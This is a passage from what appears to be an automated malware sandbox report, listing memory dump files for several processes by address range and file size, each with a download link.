    • memory/3144-240-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

      Download

    • memory/3144-242-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

      Download

    • memory/3144-244-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

      Download

    • memory/3516-14-0x00007FFA7AB30000-0x00007FFA7B5F1000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/3516-13-0x00007FFA7AB30000-0x00007FFA7B5F1000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/3516-9-0x00000218B5B80000-0x00000218B5BA2000-memory.dmp

      Filesize

      136KB

      Download

    • memory/3516-38-0x00007FFA7AB33000-0x00007FFA7AB35000-memory.dmp

      Filesize

      8KB

      Download

    • memory/3516-43-0x00007FFA7AB30000-0x00007FFA7B5F1000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/3516-150-0x00007FFA7AB30000-0x00007FFA7B5F1000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/3516-2-0x00007FFA7AB33000-0x00007FFA7AB35000-memory.dmp

      Filesize

      8KB

      Download

    • memory/4256-229-0x0000000007A50000-0x0000000007A6A000-memory.dmp

      Filesize

      104KB

      Download

    • memory/4256-166-0x00000000055E0000-0x0000000005646000-memory.dmp

      Filesize

      408KB

      Download

    • memory/4256-167-0x0000000005650000-0x00000000056B6000-memory.dmp

      Filesize

      408KB

      Download

    • memory/4256-228-0x0000000007950000-0x0000000007964000-memory.dmp

      Filesize

      80KB

      Download

    • memory/4256-180-0x0000000005DF0000-0x0000000006144000-memory.dmp

      Filesize

      3.3MB

      Download

    • memory/4256-227-0x0000000007940000-0x000000000794E000-memory.dmp

      Filesize

      56KB

      Download

    • memory/4256-226-0x0000000007910000-0x0000000007921000-memory.dmp

      Filesize

      68KB

      Download

    • memory/4256-225-0x0000000007990000-0x0000000007A26000-memory.dmp

      Filesize

      600KB

      Download

    • memory/4256-223-0x0000000007710000-0x000000000772A000-memory.dmp

      Filesize

      104KB

      Download

    • memory/4256-230-0x0000000007A30000-0x0000000007A38000-memory.dmp

      Filesize

      32KB

      Download

    • memory/4256-222-0x0000000007D60000-0x00000000083DA000-memory.dmp

      Filesize

      6.5MB

      Download

    • memory/4256-221-0x00000000075C0000-0x0000000007663000-memory.dmp

      Filesize

      652KB

      Download

    • memory/4256-210-0x0000000007350000-0x000000000736E000-memory.dmp

      Filesize

      120KB

      Download

    • memory/4256-199-0x0000000007370000-0x00000000073A2000-memory.dmp

      Filesize

      200KB

      Download

    • memory/4256-200-0x0000000065040000-0x000000006508C000-memory.dmp

      Filesize

      304KB

      Download

    • memory/4256-165-0x0000000005340000-0x0000000005362000-memory.dmp

      Filesize

      136KB

      Download